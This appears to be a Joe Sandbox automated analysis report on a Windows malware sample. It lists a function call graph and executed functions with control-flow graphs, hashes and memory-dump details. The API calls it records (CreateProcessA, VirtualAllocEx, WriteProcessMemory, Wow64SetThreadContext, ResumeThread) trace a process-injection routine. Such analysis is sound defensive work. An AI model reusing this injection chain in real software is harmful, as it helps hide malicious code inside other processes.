33543->33544 33544->33512 33546 5892e69 33545->33546 33551 5894293 33545->33551 33546->33527 33549 5892e69 33548->33549 33550 5894293 CallWindowProcW 33548->33550 33549->33527 33550->33549 33552 5891284 CallWindowProcW 33551->33552 33553 58942aa 33552->33553 33553->33546 33554 7c37aa7 33555 7c37a3f 33554->33555 33556 7c37a1e 33554->33556 33556->33555 33560 7c3a5a6 33556->33560 33577 7c3a538 33556->33577 33593 7c3a548 33556->33593 33561 7c3a534 33560->33561 33562 7c3a5a9 33560->33562 33563 7c3a586 33561->33563 33609 7c3ab0d 33561->33609 33614 7c3ab4f 33561->33614 33619 7c3a868 33561->33619 33625 7c3ae04 33561->33625 33630 7c3aac2 33561->33630 33634 7c3b05d 33561->33634 33639 7c3a858 33561->33639 33645 7c3b1da 33561->33645 33649 7c3acd4 33561->33649 33654 7c3ae96 33561->33654 33659 7c3abb0 33561->33659 33664 7c3ad51 33561->33664 33669 7c3ab6c 33561->33669 33563->33555 33578 7c3a562 33577->33578 33579 7c3aac2 2 API calls 33578->33579 33580 7c3ae04 2 API calls 33578->33580 33581 7c3a868 2 API calls 33578->33581 33582 7c3ab4f 2 API calls 33578->33582 33583 7c3ab0d 2 API calls 33578->33583 33584 7c3ab6c 2 API calls 33578->33584 33585 7c3ad51 2 API calls 33578->33585 33586 7c3abb0 2 API calls 33578->33586 33587 7c3ae96 2 API calls 33578->33587 33588 7c3acd4 2 API calls 33578->33588 33589 7c3b1da 2 API calls 33578->33589 33590 7c3a586 33578->33590 33591 7c3a858 2 API calls 33578->33591 33592 7c3b05d 2 API calls 33578->33592 33579->33590 33580->33590 33581->33590 33582->33590 33583->33590 33584->33590 33585->33590 33586->33590 33587->33590 33588->33590 33589->33590 33590->33555 33591->33590 33592->33590 33594 7c3a562 33593->33594 33595 7c3aac2 2 API calls 33594->33595 33596 7c3ae04 2 API calls 33594->33596 33597 7c3a868 2 API calls 33594->33597 33598 7c3ab4f 2 API calls 33594->33598 33599 7c3ab0d 2 API calls 33594->33599 33600 7c3ab6c 2 API calls 33594->33600 33601 7c3ad51 2 API calls 33594->33601 33602 7c3abb0 2 API calls 33594->33602 33603 7c3ae96 2 API calls 33594->33603 33604 7c3acd4 2 API calls 33594->33604 33605 7c3b1da 2 API calls 33594->33605 33606 7c3a586 33594->33606 33607 7c3a858 2 API calls 33594->33607 33608 7c3b05d 2 API calls 33594->33608 33595->33606 33596->33606 33597->33606 33598->33606 33599->33606 33600->33606 33601->33606 33602->33606 33603->33606 33604->33606 33605->33606 33606->33555 33607->33606 33608->33606 33610 7c3ab59 33609->33610 33673 7c37380 33610->33673 33677 7c3737b 33610->33677 33611 7c3b245 33615 7c3ab66 33614->33615 33617 7c37380 WriteProcessMemory 33615->33617 33618 7c3737b WriteProcessMemory 33615->33618 33616 7c3b245 33617->33616 33618->33616 33621 7c3a89b 33619->33621 33620 7c3a924 33620->33563 33621->33620 33681 7c37608 33621->33681 33685 7c375ff 33621->33685 33626 7c3ae2a 33625->33626 33689 7c37130 33626->33689 33693 7c37138 33626->33693 33627 7c3ae3f 33627->33563 33697 7c37470 33630->33697 33701 7c3746b 33630->33701 33631 7c3aaae 33631->33563 33635 7c3ae2a 33634->33635 33636 7c3ae3f 33634->33636 33637 7c37130 ResumeThread 33635->33637 33638 7c37138 ResumeThread 33635->33638 33636->33563 33637->33636 33638->33636 33641 7c3a89b 33639->33641 33640 7c3a924 33640->33563 33641->33640 33643 7c37608 CreateProcessA 33641->33643 33644 7c375ff CreateProcessA 33641->33644 33642 7c3aa83 33643->33642 33644->33642 33705 7c372b8 33645->33705 33709 7c372c0 33645->33709 33646 7c3b1f8 33650 7c3adb1 33649->33650 33713 7c371e0 33650->33713 33717 7c371e8 33650->33717 33651 7c3adcc 33655 7c3ae9a 33654->33655 33721 7c3b681 33655->33721 33726 7c3b690 33655->33726 33656 7c3aeb3 33660 7c3abc0 33659->33660 33662 7c37380 WriteProcessMemory 33660->33662 33663 7c3737b WriteProcessMemory 33660->33663 33661 7c3ad92 33661->33563 33662->33661 33663->33661 33665 7c3ae9a 33664->33665 33667 7c3b681 2 API calls 33665->33667 33668 7c3b690 2 API calls 33665->33668 33666 7c3aeb3 33667->33666 33668->33666 33671 7c37380 WriteProcessMemory 33669->33671 33672 7c3737b WriteProcessMemory 33669->33672 33670 7c3ab90 33671->33670 33672->33670 33674 7c373c8 WriteProcessMemory 33673->33674 33676 7c3741f 33674->33676 33676->33611 33678 7c373c8 WriteProcessMemory 33677->33678 33680 7c3741f 33678->33680 33680->33611 33682 7c37691 33681->33682 33682->33682 33683 7c377f6 CreateProcessA 33682->33683 33684 7c37853 33683->33684 33684->33684 33686 7c37691 33685->33686 33686->33686 33687 7c377f6 CreateProcessA 33686->33687 33688 7c37853 33687->33688 33688->33688 33690 7c37178 ResumeThread 33689->33690 33692 7c371a9 33690->33692 33692->33627 33694 7c37178 ResumeThread 33693->33694 33696 7c371a9 33694->33696 33696->33627 33698 7c374bb ReadProcessMemory 33697->33698 33700 7c374ff 33698->33700 33700->33631 33702 7c37471 ReadProcessMemory 33701->33702 33704 7c374ff 33702->33704 33704->33631 33706 7c37300 VirtualAllocEx 33705->33706 33708 7c3733d 33706->33708 33708->33646 33710 7c37300 VirtualAllocEx 33709->33710 33712 7c3733d 33710->33712 33712->33646 33714 7c3722d Wow64SetThreadContext 33713->33714 33716 7c37275 33714->33716 33716->33651 33718 7c3722d Wow64SetThreadContext 33717->33718 33720 7c37275 33718->33720 33720->33651 33722 7c3b6a5 33721->33722 33724 7c371e0 Wow64SetThreadContext 33722->33724 33725 7c371e8 Wow64SetThreadContext 33722->33725 33723 7c3b6bb 33723->33656 33724->33723 33725->33723 33727 7c3b6a5 33726->33727 33729 7c371e0 Wow64SetThreadContext 33727->33729 33730 7c371e8 Wow64SetThreadContext 33727->33730 33728 7c3b6bb 33728->33656 33729->33728 33730->33728 33752 19ed668 DuplicateHandle 33753 19ed6fe 33752->33753 33754 5891cf0 33755 5891d58 CreateWindowExW 33754->33755 33757 5891e14 33755->33757 33485 7c3b718 33486 7c3b8a3 33485->33486 33488 7c3b73e 33485->33488 33488->33486 33489 7c38470 33488->33489 33490 7c3b998 PostMessageW 33489->33490 33491 7c3ba04 33490->33491 33491->33488 33453 19eb090 33457 19eb178 33453->33457 33465 19eb188 33453->33465 33454 19eb09f 33458 19eb199 33457->33458 33459 19eb1bc 33457->33459 33458->33459 33473 19eb410 33458->33473 33477 19eb420 33458->33477 33459->33454 33460 19eb1b4 33460->33459 33461 19eb3c0 GetModuleHandleW 33460->33461 33462 19eb3ed 33461->33462 33462->33454 33466 19eb199 33465->33466 33468 19eb1bc 33465->33468 33466->33468 33471 19eb410 LoadLibraryExW 33466->33471 33472 19eb420 LoadLibraryExW 33466->33472 33467 19eb1b4 33467->33468 33469 19eb3c0 GetModuleHandleW 33467->33469 33468->33454 33470 19eb3ed 33469->33470 33470->33454 33471->33467 33472->33467 33474 19eb415 33473->33474 33475 19eb459 33474->33475 33481 19eaea8 33474->33481 33475->33460 33478 19eb434 33477->33478 33479 19eb459 33478->33479 33480 19eaea8 LoadLibraryExW 33478->33480 33479->33460 33480->33479 33482 19eb600 LoadLibraryExW 33481->33482 33484 19eb679 33482->33484 33484->33475 33731 19e4a30 33732 19e4a31 33731->33732 33733 19e4a3f 33732->33733 33735 19e4b28 33732->33735 33736 19e4b4d 33735->33736 33740 19e4c38 33736->33740 33744 19e4c28 33736->33744 33741 19e4c5f 33740->33741 33742 19e4d3c 33741->33742 33748 19e4800 33741->33748 33746 19e4c38 33744->33746 33745 19e4d3c 33745->33745 33746->33745 33747 19e4800 CreateActCtxA 33746->33747 33747->33745 33749 19e5cc8 CreateActCtxA 33748->33749 33751 19e5d8b 33749->33751 33758 19ed420 33759 19ed466 GetCurrentProcess 33758->33759 33761 19ed4b8 GetCurrentThread 33759->33761 33763 19ed4b1 33759->33763 33762 19ed4f5 GetCurrentProcess 33761->33762 33764 19ed4ee 33761->33764 33767 19ed52b 33762->33767 33763->33761 33764->33762 33765 19ed553 GetCurrentThreadId 33766 19ed584 33765->33766 33767->33765

                      Executed Functions

                      Function 05891FF0 Relevance: .3, Instructions: 261COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1738044111.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5890000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f930377a6568341c247dd1e2f521139bf3490b3df1b14b1aca22d04739861669
                      • Instruction ID: 12985813c2946d3c750015490121d147bc5cffe333765a8dff1d157c05f09f36
                      • Opcode Fuzzy Hash: f930377a6568341c247dd1e2f521139bf3490b3df1b14b1aca22d04739861669
                      • Instruction Fuzzy Hash: 42B16435E1031A9FCF04DFA4D8589DDFBBAFF89314B158215E51AAB2A4DB30AD81CB50
                      Function 07C3A868 Relevance: .2, Instructions: 169COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746245815.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7c30000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 82d2450da6ccf9d8053faf58744d482664d45abd958609d429cc86fee4e08182
                      • Instruction ID: 60a3d72881cab3c88e1c4814469efb26f952a4860da31f530da0fb579cac36de
                      • Opcode Fuzzy Hash: 82d2450da6ccf9d8053faf58744d482664d45abd958609d429cc86fee4e08182
                      • Instruction Fuzzy Hash: 226117B1D147198BDB28CF66CC407EDFBB6AF89300F14D1AAD50DA6250EB705A85CF40
                      Function 019ED410 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151threadCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 294 19ed410-19ed418 295 19ed41a-19ed4af GetCurrentProcess 294->295 296 19ed3d2-19ed40f 294->296 303 19ed4b8-19ed4ec GetCurrentThread 295->303 304 19ed4b1-19ed4b7 295->304 306 19ed4ee-19ed4f4 303->306 307 19ed4f5-19ed529 GetCurrentProcess 303->307 304->303 306->307 309 19ed52b-19ed531 307->309 310 19ed532-19ed54d call 19ed5ef 307->310 309->310 314 19ed553-19ed582 GetCurrentThreadId 310->314 315 19ed58b-19ed5ed 314->315 316 19ed584-19ed58a 314->316 316->315
                      APIs
                      • GetCurrentProcess.KERNEL32 ref: 019ED49E
                      • GetCurrentThread.KERNEL32 ref: 019ED4DB
                      • GetCurrentProcess.KERNEL32 ref: 019ED518
                      • GetCurrentThreadId.KERNEL32 ref: 019ED571
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1734631081.00000000019E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019E0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_19e0000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID: Current$ProcessThread
                      • String ID: 4'^q
                      • API String ID: 2063062207-1614139903
                      • Opcode ID: 9ce416801fefa95153d82a32ad31eb42e5feaff13c1657804a9eb31a5bf0d96d
                      • Instruction ID: 5bbbd605daffd104bcf666f2b4a43672ee02e489a3f8644558b85ad454f25e91
                      • Opcode Fuzzy Hash: 9ce416801fefa95153d82a32ad31eb42e5feaff13c1657804a9eb31a5bf0d96d
                      • Instruction Fuzzy Hash: 896169B0910249CFDB15DFA9D548BEEBBF1EF88304F20C569D409A72A4DB34A984CB65
                      Function 019ED420 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 323 19ed420-19ed4af GetCurrentProcess 327 19ed4b8-19ed4ec GetCurrentThread 323->327 328 19ed4b1-19ed4b7 323->328 329 19ed4ee-19ed4f4 327->329 330 19ed4f5-19ed529 GetCurrentProcess 327->330 328->327 329->330 332 19ed52b-19ed531 330->332 333 19ed532-19ed54d call 19ed5ef 330->333 332->333 336 19ed553-19ed582 GetCurrentThreadId 333->336 337 19ed58b-19ed5ed 336->337 338 19ed584-19ed58a 336->338 338->337
                      APIs
                      • GetCurrentProcess.KERNEL32 ref: 019ED49E
                      • GetCurrentThread.KERNEL32 ref: 019ED4DB
                      • GetCurrentProcess.KERNEL32 ref: 019ED518
                      • GetCurrentThreadId.KERNEL32 ref: 019ED571
                      Memory Dump Source
                      • Source File: 00000000.00000002.1734631081.00000000019E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019E0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_19e0000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID: Current$ProcessThread
                      • String ID:
                      • API String ID: 2063062207-0
                      • Opcode ID: 0216d7450c05ad82a05ef0f06146ac0856238764ad969dc140951f5d73f98ab2
                      • Instruction ID: c2d42bb00cbd73656a743a9e3f80c13aa380ed3d920538963947bb96cfe5217f
                      • Opcode Fuzzy Hash: 0216d7450c05ad82a05ef0f06146ac0856238764ad969dc140951f5d73f98ab2
                      • Instruction Fuzzy Hash: 685157B09103498FDB14DFA9D548BEEBBF1AF88314F20C459D419A7360DB34A984CF65
                      Function 07C375FF Relevance: 1.7, APIs: 1, Instructions: 244processCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 497 7c375ff-7c3769d 499 7c376d6-7c376f6 497->499 500 7c3769f-7c376a9 497->500 505 7c376f8-7c37702 499->505 506 7c3772f-7c3775e 499->506 500->499 501 7c376ab-7c376ad 500->501 502 7c376d0-7c376d3 501->502 503 7c376af-7c376b9 501->503 502->499 507 7c376bb 503->507 508 7c376bd-7c376cc 503->508 505->506 509 7c37704-7c37706 505->509 516 7c37760-7c3776a 506->516 517 7c37797-7c37851 CreateProcessA 506->517 507->508 508->508 510 7c376ce 508->510 511 7c37729-7c3772c 509->511 512 7c37708-7c37712 509->512 510->502 511->506 514 7c37716-7c37725 512->514 515 7c37714 512->515 514->514 518 7c37727 514->518 515->514 516->517 519 7c3776c-7c3776e 516->519 528 7c37853-7c37859 517->528 529 7c3785a-7c378e0 517->529 518->511 521 7c37791-7c37794 519->521 522 7c37770-7c3777a 519->522 521->517 523 7c3777e-7c3778d 522->523 524 7c3777c 522->524 523->523 526 7c3778f 523->526 524->523 526->521 528->529 539 7c378e2-7c378e6 529->539 540 7c378f0-7c378f4 529->540 539->540 541 7c378e8 539->541 542 7c378f6-7c378fa 540->542 543 7c37904-7c37908 540->543 541->540 542->543 544 7c378fc 542->544 545 7c3790a-7c3790e 543->545 546 7c37918-7c3791c 543->546 544->543 545->546 547 7c37910 545->547 548 7c3792e-7c37935 546->548 549 7c3791e-7c37924 546->549 547->546 550 7c37937-7c37946 548->550 551 7c3794c 548->551 549->548 550->551 553 7c3794d 551->553 553->553
                      APIs
                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07C3783E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746245815.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7c30000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 09afcc9d2d3d0d3417a50078ec3bcd64f20449e9869ef9785d13581fefb007df
                      • Instruction ID: 2c358f79698abaf44c69639c461ed51539b8972e88bf54ee652ea9e0a0860584
                      • Opcode Fuzzy Hash: 09afcc9d2d3d0d3417a50078ec3bcd64f20449e9869ef9785d13581fefb007df
                      • Instruction Fuzzy Hash: 549181B1D0031ADFDB10CF68C8817DDBBB2BF45314F1485A9D809A7240DB749A85CF92
                      Function 07C37608 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 554 7c37608-7c3769d 556 7c376d6-7c376f6 554->556 557 7c3769f-7c376a9 554->557 562 7c376f8-7c37702 556->562 563 7c3772f-7c3775e 556->563 557->556 558 7c376ab-7c376ad 557->558 559 7c376d0-7c376d3 558->559 560 7c376af-7c376b9 558->560 559->556 564 7c376bb 560->564 565 7c376bd-7c376cc 560->565 562->563 566 7c37704-7c37706 562->566 573 7c37760-7c3776a 563->573 574 7c37797-7c37851 CreateProcessA 563->574 564->565 565->565 567 7c376ce 565->567 568 7c37729-7c3772c 566->568 569 7c37708-7c37712 566->569 567->559 568->563 571 7c37716-7c37725 569->571 572 7c37714 569->572 571->571 575 7c37727 571->575 572->571 573->574 576 7c3776c-7c3776e 573->576 585 7c37853-7c37859 574->585 586 7c3785a-7c378e0 574->586 575->568 578 7c37791-7c37794 576->578 579 7c37770-7c3777a 576->579 578->574 580 7c3777e-7c3778d 579->580 581 7c3777c 579->581 580->580 583 7c3778f 580->583 581->580 583->578 585->586 596 7c378e2-7c378e6 586->596 597 7c378f0-7c378f4 586->597 596->597 598 7c378e8 596->598 599 7c378f6-7c378fa 597->599 600 7c37904-7c37908 597->600 598->597 599->600 601 7c378fc 599->601 602 7c3790a-7c3790e 600->602 603 7c37918-7c3791c 600->603 601->600 602->603 604 7c37910 602->604 605 7c3792e-7c37935 603->605 606 7c3791e-7c37924 603->606 604->603 607 7c37937-7c37946 605->607 608 7c3794c 605->608 606->605 607->608 610 7c3794d 608->610 610->610
                      APIs
                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07C3783E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746245815.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7c30000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 9fd7b34de569670e87c2b6dbac83bf1145b09b75e873d1c07f372125732242d1
                      • Instruction ID: cd957474886b187be7471856a982a61e0b31a520449407b700b1200ab7ae8c86
                      • Opcode Fuzzy Hash: 9fd7b34de569670e87c2b6dbac83bf1145b09b75e873d1c07f372125732242d1
                      • Instruction Fuzzy Hash: A49181B1D0031ADFDB10CF68C881BDDBBB2BF45314F1485A9D849A7250DB749A85CF92
                      Function 019EB188 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 611 19eb188-19eb197 612 19eb199-19eb1a6 call 19eae40 611->612 613 19eb1c3-19eb1c7 611->613 620 19eb1bc 612->620 621 19eb1a8 612->621 614 19eb1db-19eb21c 613->614 615 19eb1c9-19eb1d3 613->615 622 19eb21e-19eb226 614->622 623 19eb229-19eb237 614->623 615->614 620->613 668 19eb1ae call 19eb410 621->668 669 19eb1ae call 19eb420 621->669 622->623 625 19eb25b-19eb25d 623->625 626 19eb239-19eb23e 623->626 624 19eb1b4-19eb1b6 624->620 627 19eb2f8-19eb3b8 624->627 628 19eb260-19eb267 625->628 629 19eb249 626->629 630 19eb240-19eb247 call 19eae4c 626->630 661 19eb3ba-19eb3bd 627->661 662 19eb3c0-19eb3eb GetModuleHandleW 627->662 632 19eb269-19eb271 628->632 633 19eb274-19eb27b 628->633 631 19eb24b-19eb259 629->631 630->631 631->628 632->633 635 19eb27d-19eb285 633->635 636 19eb288-19eb291 call 19eae5c 633->636 635->636 642 19eb29e-19eb2a3 636->642 643 19eb293-19eb29b 636->643 644 19eb2a5-19eb2ac 642->644 645 19eb2c1-19eb2c5 642->645 643->642 644->645 647 19eb2ae-19eb2be call 19eae6c call 19eae7c 644->647 666 19eb2c8 call 19eb720 645->666 667 19eb2c8 call 19eb711 645->667 647->645 648 19eb2cb-19eb2ce 651 19eb2d0-19eb2ee 648->651 652 19eb2f1-19eb2f7 648->652 651->652 661->662 663 19eb3ed-19eb3f3 662->663 664 19eb3f4-19eb408 662->664 663->664 666->648 667->648 668->624 669->624
                      APIs
                      • GetModuleHandleW.KERNELBASE(00000000), ref: 019EB3DE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1734631081.00000000019E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019E0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_19e0000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID: HandleModule
                      • String ID:
                      • API String ID: 4139908857-0
                      • Opcode ID: b4b30430c44f5f6a06426ce213c3e760a15b306e79cafd13d7214565586b9e2c
                      • Instruction ID: d37a19a00e6585ca71c1255978668233f0684991ae54fa7244df2e952ef8f272
                      • Opcode Fuzzy Hash: b4b30430c44f5f6a06426ce213c3e760a15b306e79cafd13d7214565586b9e2c
                      • Instruction Fuzzy Hash: 98711070A00B058FD725DF6AD44979ABBF5FF88300F008A2DD48A9BB50DB75E945CB90
                      Function 05891CE4 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 670 5891ce4-5891d56 671 5891d58-5891d5e 670->671 672 5891d61-5891d68 670->672 671->672 673 5891d6a-5891d70 672->673 674 5891d73-5891dab 672->674 673->674 675 5891db3-5891e12 CreateWindowExW 674->675 676 5891e1b-5891e53 675->676 677 5891e14-5891e1a 675->677 681 5891e60 676->681 682 5891e55-5891e58 676->682 677->676 683 5891e61 681->683 682->681 683->683
                      APIs
                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05891E02
                      Memory Dump Source
                      • Source File: 00000000.00000002.1738044111.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5890000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID: CreateWindow
                      • String ID:
                      • API String ID: 716092398-0
                      • Opcode ID: 1f9896e56926c2698fb35a7d6b81909336cda454abddc626a71a79c8bb9b9bba
                      • Instruction ID: 9dd17c3f24da48449ee867c7aaddb1bbbc2a5896aef469e273a02523c4cc4294
                      • Opcode Fuzzy Hash: 1f9896e56926c2698fb35a7d6b81909336cda454abddc626a71a79c8bb9b9bba
                      • Instruction Fuzzy Hash: ED51C1B1D00309DFDF14CFA9C884ADEBBB2BF88350F64812AE819AB214D7759945CF90
                      Function 05891CF0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 684 5891cf0-5891d56 685 5891d58-5891d5e 684->685 686 5891d61-5891d68 684->686 685->686 687 5891d6a-5891d70 686->687 688 5891d73-5891e12 CreateWindowExW 686->688 687->688 690 5891e1b-5891e53 688->690 691 5891e14-5891e1a 688->691 695 5891e60 690->695 696 5891e55-5891e58 690->696 691->690 697 5891e61 695->697 696->695 697->697
                      APIs
                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05891E02
                      Memory Dump Source
                      • Source File: 00000000.00000002.1738044111.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5890000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID: CreateWindow
                      • String ID:
                      • API String ID: 716092398-0
                      • Opcode ID: 0ae80c81daff8a57c32250ac3338e2b14ce9eadb69114cba613795ac2af17b57
                      • Instruction ID: 42594fc8d1da275fad5daf212fab06016b957ab9e01822fd518a90936c2cfd43
                      • Opcode Fuzzy Hash: 0ae80c81daff8a57c32250ac3338e2b14ce9eadb69114cba613795ac2af17b57
                      • Instruction Fuzzy Hash: 8841C0B1D043099FDF14CF99C884ADEFBB6BF48354F64812AE819AB210D7719845CF90
                      Function 019E5CBC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 698 19e5cbc-19e5cc4 699 19e5ccc-19e5d89 CreateActCtxA 698->699 701 19e5d8b-19e5d91 699->701 702 19e5d92-19e5dec 699->702 701->702 709 19e5dee-19e5df1 702->709 710 19e5dfb-19e5dff 702->710 709->710 711 19e5e10 710->711 712 19e5e01-19e5e0d 710->712 714 19e5e11 711->714 712->711 714->714
                      APIs
                      • CreateActCtxA.KERNEL32(?), ref: 019E5D79
                      Memory Dump Source
                      • Source File: 00000000.00000002.1734631081.00000000019E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019E0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_19e0000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID: Create
                      • String ID:
                      • API String ID: 2289755597-0
                      • Opcode ID: e5f6d46d0fd1f7382179369ae2b8680c18f47881e6ca6b8f3c340fa584e94675
                      • Instruction ID: 4bd09cdb81bf4aecf661488b0e4e50b016d30e819056278b62751831077ecf68
                      • Opcode Fuzzy Hash: e5f6d46d0fd1f7382179369ae2b8680c18f47881e6ca6b8f3c340fa584e94675
                      • Instruction Fuzzy Hash: 224102B0C00619CFDB14CFA9C8887CDBBF5BF48304F24815AD008AB265DB756986CF90
                      Function 05891284 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 715 5891284-58942fc 718 58943ac-58943cc call 589115c 715->718 719 5894302-5894307 715->719 726 58943cf-58943dc 718->726 721 5894309-5894340 719->721 722 589435a-5894392 CallWindowProcW 719->722 728 5894349-5894358 721->728 729 5894342-5894348 721->729 724 589439b-58943aa 722->724 725 5894394-589439a 722->725 724->726 725->724 728->726 729->728
                      APIs
                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 05894381
                      Memory Dump Source
                      • Source File: 00000000.00000002.1738044111.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5890000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID: CallProcWindow
                      • String ID:
                      • API String ID: 2714655100-0
                      • Opcode ID: f35eb9f3f6a7b7256f636ec8d37b2fd59269fac9fa35f01e7d747ac6fb5df4d9
                      • Instruction ID: d33025026eea5773e1a829fd4577bba99ba780bd2c831b3e479450a152d847f1
                      • Opcode Fuzzy Hash: f35eb9f3f6a7b7256f636ec8d37b2fd59269fac9fa35f01e7d747ac6fb5df4d9
                      • Instruction Fuzzy Hash: F34129B4910309CFCB14DF99C848AAAFBF5FF89314F28C559D519AB321D774A845CBA0
                      Function 019E4800 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 732 19e4800-19e5d89 CreateActCtxA 735 19e5d8b-19e5d91 732->735 736 19e5d92-19e5dec 732->736 735->736 743 19e5dee-19e5df1 736->743 744 19e5dfb-19e5dff 736->744 743->744 745 19e5e10 744->745 746 19e5e01-19e5e0d 744->746 748 19e5e11 745->748 746->745 748->748
                      APIs
                      • CreateActCtxA.KERNEL32(?), ref: 019E5D79
                      Memory Dump Source
                      • Source File: 00000000.00000002.1734631081.00000000019E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019E0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_19e0000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID: Create
                      • String ID:
                      • API String ID: 2289755597-0
                      • Opcode ID: 9de0d43974cab1ed526ed5ae44eee259c9606fbffa2844d6d4a69a121f13d761
                      • Instruction ID: 94cf1d075de4011e88bbf055fecb44c1938a8fe60433055a0c32ea5dfcb72d21
                      • Opcode Fuzzy Hash: 9de0d43974cab1ed526ed5ae44eee259c9606fbffa2844d6d4a69a121f13d761
                      • Instruction Fuzzy Hash: 2141C2B0C00719CFDB24DF99C848B9EBBF5BF48304F25815AD408AB255DB755986CF90
                      Function 07C37380 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                      Download Yara Rule
                      APIs
                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07C37410
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746245815.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7c30000_PzPxqbK89H.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: 3cb9366cc13b664f47a3cd5b294f32808c8be46674cab4ac00f2257d6c4b058d
                      • Instruction ID: fc4b1bc23d22de4b403379d578ad3020c1f5ab71e52a81236398941f8e55aa81
                      • Opcode Fuzzy Hash: 3cb9366cc13b664f47a3cd5b294f32808c8be46674cab4ac00f2257d6c4b058d
                      • Instruction Fuzzy Hash: F32125B19003599FDB10DFA9C885BDEBBF5FF48310F10842AE959A7250C778A954CFA4
                      Function 07C3737B Relevance: 1.6, APIs: 1, Instructions: 66injectionCOMMON
                      Download Yara Rule
                      APIs
                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07C37410
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746245815.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false
                      Joe Sandbox IDA Plugin
